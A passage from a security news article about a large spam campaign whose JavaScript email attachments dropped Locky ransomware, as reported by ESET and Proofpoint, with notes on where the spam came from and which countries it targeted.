Until now, two different companies reported on this event, ESET and Proofpoint, the latter even going as far as calling it as one of the biggest spam floods in recent years.
This code generally downloads and then launches into execution malware. For this particular campaign, the criminals’ favorite payload is the Locky ransomware. This ransomware variant appeared at the start of the year and has known ties to the Dridex botnet.
In previous spam distribution campaigns, JS-based malicious email attachments also delivered banking trojans and ransomware variants like TeslaCrypt and CryptoWall.
Spam wave hit Europe the hardest
For this most recent campaign, Proofpoint said it saw an uptick of email spam originating from Indian and Vietnamese IPs. ESET said the wave aimed at European countries, but crooks didn’t deliver Locky directly but used the JS/Danger.ScriptAttachment malware dropper as a second intermediary.